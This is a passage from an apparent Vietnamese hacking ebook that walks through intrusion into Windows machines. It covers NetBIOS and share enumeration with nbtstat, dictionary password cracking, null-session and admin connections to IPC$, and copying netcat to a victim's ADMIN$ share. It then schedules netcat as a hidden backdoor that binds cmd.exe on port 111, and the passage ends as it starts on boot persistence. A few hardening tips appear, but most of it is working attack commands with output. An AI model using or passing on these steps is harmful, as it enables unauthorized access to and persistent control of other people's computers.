Hacker Professional Ebook part 29 ppt
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (82.64 KB, 6 trang )
The command completed successfully.
C:\>
Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows
NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn
nhiều so với NTFS)
Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy
Administrator cũng có thể làm được tất cả ( bạn có tin không ?).
Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất
cứ lúc nào.
Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập
vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ
ánh sạ ổ đĩa ,thư mục share để truy cập vào.
Cũng bằng command line:
CODE
C:\> net use z: \\x.x.x.x \share
The command completed successfully.
Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy
của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế
là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy
username & password
Lấy Username :
CODE
C:\> Nbtstat –A x.x.x.x
NetBIOS Remote Machine Name Table
Name Type Status
ADMIN <00> UNIQUE Registered
BODY <00> GROUP Registered
ADMIN f <20> UNIQUE Registered
BODY <1E> GROUP Registered
BODY <1D> UNIQUE Registered
__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-08-A1-5B-E3-8C
Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY
Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như :
pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng
phán đoán của hacker ) tên là : pass.txt
CODE
“” ADMIN
123456 ADMIN
123456 BODY
“” BODY
…
Sau đó hacker crack bang lệnh :
[/code]Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:
CODE
C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt
x.x.x.x.%I>>output.txt
Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì
vậy hacker bằng mọi giá sẽ lấy cho được administrator.
nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.
Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt
password phức tạp 1 chút )
Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?
Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc
dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới
IPC$ ( mặc định share của windows)
CODE
C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.
Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một
Null session tới máy victim:
CODE
C:\> net use \\x.x.x.x\IPC$ “” /user:””
The command completed successfully
Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.
khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area
Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS
và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không
cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .
Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi
mà không biết phải làm sao )
Giả sử rằng bạn đã có username,password của admin của máy victim rồi:
giờ thiết lập 1 phiên làm viêc:
CODE
C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.
Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor
nhưng tôi thấy hơn cả vẫn là : netcat ( nc)
chép nc vào máy victim
CODE
C:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies
Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file
trên máy victim, mặc đinh khi cài win sẽ chạy service này)
CODE
C:\> sc \\x.x.x.x start schedule
service_name : schedule
Bây giờ kiểm tra giờ trên máy victim
CODE
C:\> net time \\x.x.x.x
Current time at \\10.0.0.31 is 6/29/2005 4:50 AM
The command completed successfully.
Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:
CODE
C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe
Added a new job with job ID = 1
đợi đến 4:55 rồi chạy thử nc.exe
CODE
C:\>nc –nvv x.x.x.x 111
(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\windows>
Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’)
Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy
và lắng nghe mệnh lệnh của ta?
Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng
notepad và save lại thành .reg) có nội dung như sau:
